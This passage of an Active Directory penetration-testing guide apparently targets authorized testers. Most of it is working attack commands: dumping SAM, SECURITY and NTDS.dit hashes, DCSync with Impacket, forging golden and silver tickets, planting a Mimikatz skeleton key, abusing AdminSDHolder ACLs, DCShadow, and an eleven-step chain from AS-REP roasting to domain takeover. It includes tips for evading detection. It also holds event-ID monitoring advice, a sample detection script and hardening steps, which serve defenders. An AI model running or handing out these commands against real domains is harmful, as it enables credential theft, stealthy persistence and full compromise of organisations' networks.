SAM/SYSTEM Dumping

```powershell
# Dump the SAM and SECURITY hives (SYSTEM holds the boot key needed to decrypt them)
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
reg save HKLM\SECURITY security.save
```

```bash
# Extract local hashes and LSA secrets (cached domain credentials, service account passwords) with Impacket
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
# Remotely with CrackMapExec
crackmapexec smb 192.168.1.20 -u admin -p password --sam
crackmapexec smb 192.168.1.20 -u admin -p password --lsa
```
NTDS.dit Extraction
NTDS.dit is locked while the DC is running, so it is copied via ntdsutil or a Volume Shadow Copy. The hashes inside are encrypted with the boot key from the SYSTEM hive, so always take both files.

```powershell
# Method 1: Install-From-Media snapshot with ntdsutil (on the DC, as Domain Admin)
ntdsutil "ac i ntds" "ifm" "create full C:\temp\ntds" q q
# Method 1b: Volume Shadow Copy
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\temp\ntds.dit
reg save HKLM\SYSTEM C:\temp\SYSTEM
```

```bash
# Method 2: remotely via DCSync (no file copy at all)
secretsdump.py -just-dc target.com/admin:password@192.168.1.10
# Method 3: CrackMapExec (DRSUAPI by default; --ntds vss for a shadow copy instead)
crackmapexec smb 192.168.1.10 -u admin -p password --ntds

# Extract hashes from the copied files offline
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
```
Phase 7: Persistence
Golden Ticket
A forged TGT signed with the krbtgt account's key. It remains valid until krbtgt has been reset twice, because the KDC still accepts tickets under the previous key. Prefer the AES256 key to the RC4 hash: an RC4-encrypted TGT in a domain that otherwise uses AES is a detection signal (4768/4769 with etype 0x17).

```text
# Requires the krbtgt hash or AES key and the domain SID
# Create a golden ticket with Mimikatz
kerberos::golden /user:Administrator /domain:target.com /sid:S-1-5-21-... /krbtgt:hash /ptt
kerberos::golden /user:Administrator /domain:target.com /sid:S-1-5-21-... /aes256:key /ptt
```

```bash
# Using Impacket
ticketer.py -nthash krbtgt_hash -domain-sid S-1-5-21-... -domain target.com Administrator
export KRB5CCNAME=Administrator.ccache
```
Silver Ticket
A forged service ticket signed with the service account's key (for a computer's cifs, host or http services that is the machine account's hash). The DC is never contacted to issue it, so no 4769 is logged there; only the target host sees the ticket.

```text
# Requires the service (or machine) account hash
kerberos::golden /user:Administrator /domain:target.com /sid:S-1-5-21-... /target:server.target.com /service:cifs /rc4:service_hash /ptt
```

```bash
# Using Impacket
ticketer.py -nthash service_hash -domain-sid S-1-5-21-... -domain target.com -spn cifs/server.target.com Administrator
```
Skeleton Key
Patches LSASS on a DC so that a master password is accepted for every account alongside the real one. It does not survive a reboot of the DC, has to be installed on every DC to be reliable, and fails when LSA runs as a protected process (RunAsPPL).

```text
# Using Mimikatz on the DC (requires Domain Admin and SeDebugPrivilege)
privilege::debug
misc::skeleton
# Now any account authenticates with the password "mimikatz"; the real password keeps working too
```
AdminSDHolder
The ACL on the AdminSDHolder object is the template that the SDProp process stamps onto every protected account and group (Domain Admins, Enterprise Admins, Administrators and their members) every 60 minutes by default. An ACE added there is re-applied to all of them even after an admin removes it from an individual object, which is what makes it durable persistence.

```powershell
# Grant the attacker full control over every protected object via the template
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=target,DC=com" -PrincipalIdentity attacker -Rights All
# Verify after the next SDProp run (up to 60 minutes later)
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs | Where-Object {$_.SecurityIdentifier -eq (Get-DomainUser attacker).objectsid}
```
DCShadow
Registers the attacker's host as a temporary Domain Controller and pushes attribute changes through replication, so the change never appears as a directory modification on a real DC. Requires Domain Admin (or the equivalent rights on the Sites and Configuration containers) and two Mimikatz sessions on the same host.

```text
# Session 1 (running as SYSTEM): stage the change and start the rogue DC's RPC server
lsadump::dcshadow /object:targetuser /attribute:sidHistory /value:S-1-5-21-...-500
# Session 2 (running as Domain Admin): push the change; the rogue DC then unregisters itself
lsadump::dcshadow /push
```
Detection and Defense
Monitoring and Detection
Monitor for:
- Many failed logons for different accounts from one source (password spraying): 4625, 4771
- Unusual Kerberos activity: 4769 with RC4 (0x17) for many SPNs (Kerberoasting), 4768 with pre-authentication type 0 (AS-REP roasting), tickets with abnormal lifetimes (golden tickets)
- DCSync: 4662 carrying the replication control-access rights from anything that is not a DC
- NTLM relay: NTLM network logons (4624 type 3) from unexpected sources, and hosts where signing is not required
- Suspicious PowerShell usage: script block logging (4104) showing PowerView or Rubeus function names
- Privilege escalation: group membership changes (4728/4732/4756), ACL changes on privileged objects and AdminSDHolder (4670)
- Lateral movement: 4624 type 3/10 and service installs (7045, the PsExec pattern) on many hosts from one source

Tools:
- Windows Event Logs
- Sysmon
- Microsoft Defender for Identity
- Splunk/ELK
- Sigma rules
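The monitoring list is easier to act on as code. The following added example (not from the page or any vendor product) runs three of those detections over constructed Windows Security event records: a spray (one source IP failing for many accounts), Kerberoasting (one requester pulling RC4 service tickets for several SPNs) and DCSync (4662 with a replication control-access right from a non-DC account), then correlates the findings by source host. The event dictionaries, IP addresses, account names and thresholds are all made up for illustration; the GUIDs are the real control-access rights DCSync requires.

```python
"""Detection logic for spraying, Kerberoasting and DCSync over sample events (added example)."""
from collections import defaultdict

# Control access rights needed for DCSync, as they appear in the Properties field of event 4662:
# DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, DS-Replication-Get-Changes-In-Filtered-Set
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
    "89e95b76-444d-4c62-991a-0facbeda640c",
}
RC4_HMAC = "0x17"

# Constructed sample events: event ID plus the fields a SIEM would extract from the record.
SAMPLE_EVENTS = [
    # password spray: one source, many distinct accounts, one failure each
    *[{"id": 4625, "src_ip": "10.0.0.50", "user": u} for u in ("alice", "bob", "carol", "dave", "erin", "frank")],
    # a normal user mistyping their own password three times
    *[{"id": 4625, "src_ip": "10.0.0.77", "user": "grace"} for _ in range(3)],
    # Kerberoasting: one account requests RC4 service tickets for several SPN accounts
    {"id": 4769, "user": "bob", "service": "svc_sql", "etype": "0x17", "src_ip": "10.0.0.50"},
    {"id": 4769, "user": "bob", "service": "svc_web", "etype": "0x17", "src_ip": "10.0.0.50"},
    {"id": 4769, "user": "bob", "service": "svc_backup", "etype": "0x17", "src_ip": "10.0.0.50"},
    # ordinary AES ticket request and a TGT renewal
    {"id": 4769, "user": "carol", "service": "FS01$", "etype": "0x12", "src_ip": "10.0.0.12"},
    {"id": 4769, "user": "carol", "service": "krbtgt", "etype": "0x17", "src_ip": "10.0.0.12"},
    # DCSync: replication right exercised by a user account and, legitimately, by a real DC
    {"id": 4662, "user": "bob", "properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}", "src_ip": "10.0.0.50"},
    {"id": 4662, "user": "DC02$", "properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}", "src_ip": "10.0.0.6"},
]


def detect_password_spray(events, min_distinct_users=5):
    """One source IP failing logons (4625 or 4771) for many different accounts."""
    users_by_ip = defaultdict(set)
    for e in events:
        if e["id"] in (4625, 4771):
            users_by_ip[e["src_ip"]].add(e["user"])
    return {ip: sorted(u) for ip, u in users_by_ip.items() if len(u) >= min_distinct_users}


def detect_kerberoast(events, min_rc4_services=3):
    """One requester pulling RC4 (0x17) service tickets for several distinct SPN accounts.
    krbtgt (TGT renewals) and computer accounts (random, uncrackable passwords) are excluded."""
    services_by_user = defaultdict(set)
    for e in events:
        if e["id"] == 4769 and e["etype"] == RC4_HMAC:
            svc = e["service"]
            if svc.lower() != "krbtgt" and not svc.endswith("$"):
                services_by_user[e["user"]].add(svc)
    return {u: sorted(s) for u, s in services_by_user.items() if len(s) >= min_rc4_services}


def detect_dcsync(events, dc_accounts):
    """4662 with a replication control-access right from any account that is not a DC.
    dc_accounts should come from the Domain Controllers OU (and any Azure AD Connect
    server), not from a trailing '$': machine accounts are cheap to create."""
    hits = []
    for e in events:
        if e["id"] != 4662:
            continue
        guids = {g.strip("{}").lower() for g in e["properties"].split()}
        if guids & REPLICATION_GUIDS and e["user"] not in dc_accounts:
            hits.append((e["user"], e["src_ip"]))
    return hits


def correlate(events, dc_accounts=("DC01$", "DC02$")):
    """{src_ip: [findings]} so that one attacker host surfaces as a single incident."""
    findings = defaultdict(list)
    for ip, users in detect_password_spray(events).items():
        findings[ip].append("password spray against %d accounts" % len(users))
    for user, services in detect_kerberoast(events).items():
        ip = next(e["src_ip"] for e in events if e["id"] == 4769 and e["user"] == user)
        findings[ip].append("kerberoast by %s (%d SPNs)" % (user, len(services)))
    for user, ip in detect_dcsync(events, set(dc_accounts)):
        findings[ip].append("dcsync by %s" % user)
    return dict(findings)


if __name__ == "__main__":
    for ip, items in correlate(SAMPLE_EVENTS).items():
        print(ip)
        for item in items:
            print("  -", item)
```

The thresholds (5 distinct accounts, 3 RC4 SPNs) are starting points; tune them against a baseline of your own 4625 and 4769 volume, and add a time window to each grouping before deploying this as a rule.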
Hardening Recommendations
1. Tiered administration model: separate accounts for Tier 0 (DCs and AD), Tier 1 (servers) and Tier 2 (workstations), so a workstation compromise never exposes Domain Admin credentials
2. LAPS (Local Administrator Password Solution): randomize and rotate local administrator passwords, which breaks local-admin hash reuse across hosts
3. Protected Users group: privileged members lose NTLM, RC4, delegation and long-lived cached credentials
4. Disable or restrict NTLM: audit NTLM usage first, then enforce the Restrict NTLM policies and force Kerberos
5. SMB signing and LDAP signing/channel binding: required on all devices, which removes the relay targets
6. Credential Guard: isolate LSASS secrets with virtualization-based security, and run LSA as a protected process (RunAsPPL)
7. Remove excessive permissions: audit ACLs and delegation settings with BloodHound from the defender's side and apply least privilege
8. Monitor and audit: enable advanced audit policy (account logon, DS access, object access) and alert on the events listed above
9. Patch management: keep DCs and servers updated
10. Network segmentation: block SMB and RPC between workstations and restrict admin protocols to dedicated management hosts
Essential Tools Summary
Windows Tools
Reconnaissance/Enumeration:
- BloodHound/SharpHound
- PowerView
- ADRecon
- ADExplorer
Exploitation:
- Rubeus
- Mimikatz
- Impacket suite
- CrackMapExec
Post-Exploitation:
- PowerUp
- PowerSploit
- SharpGPOAbuse
Linux Tools
Enumeration:
- enum4linux
- ldapsearch
- bloodhound-python
Exploitation:
- Impacket (GetUserSPNs, GetNPUsers, secretsdump, psexec, etc.)
- CrackMapExec
- Responder
Credential attacks:
- hashcat
- john
Practical Attack Chain Example

```bash
# 1. Initial enumeration: live hosts, DCs, SMB signing status
crackmapexec smb 192.168.1.0/24
# 2. AS-REP roast using a username list gathered from OSINT or a null session
GetNPUsers.py target.com/ -usersfile users.txt -format hashcat -dc-ip 192.168.1.10 -no-pass -outputfile asrep.txt
# 3. Crack the hash
hashcat -m 18200 asrep.txt wordlist.txt
# 4. Validate the recovered credentials
crackmapexec smb 192.168.1.10 -u user1 -p 'CrackedPassword123'
# 5. Run BloodHound collection
bloodhound-python -u user1 -p 'CrackedPassword123' -d target.com -dc dc01.target.com -ns 192.168.1.10 -c All
# 6. Identify a path to Domain Admin in BloodHound
# 7. Exploit the path (e.g. GenericAll on another user): reset that user's password via LDAP
# 8. Kerberoast with the new access
GetUserSPNs.py target.com/user2:password -dc-ip 192.168.1.10 -request -outputfile tgs.txt
# 9. Crack the service account
hashcat -m 13100 tgs.txt wordlist.txt
# 10. If the service account has DA (or replication) rights, DCSync the domain
secretsdump.py -just-dc target.com/serviceaccount:password@192.168.1.10
# 11. Create a golden ticket for persistence with the krbtgt hash from step 10
ticketer.py -nthash krbtgt_hash -domain-sid S-1-5-21-... -domain target.com Administrator
```
Conclusion
Active Directory penetration testing requires a systematic approach and deep understanding of Windows security mechanisms. Key takeaways:
- Enumerate thoroughly - BloodHound is your best friend
- Follow the kill chain - Initial access → Lateral movement → Privilege escalation
- Abuse trust - AD is built on trust, exploit it
- Be patient - AD compromise takes time
- Stay stealthy - Use living-off-the-land techniques
- Document everything - Clear evidence for clients
Remember: Always operate within legal boundaries and only test systems you have explicit authorization to test.
Stay updated on the latest AD attack techniques and defenses. Follow for more advanced penetration testing methodologies.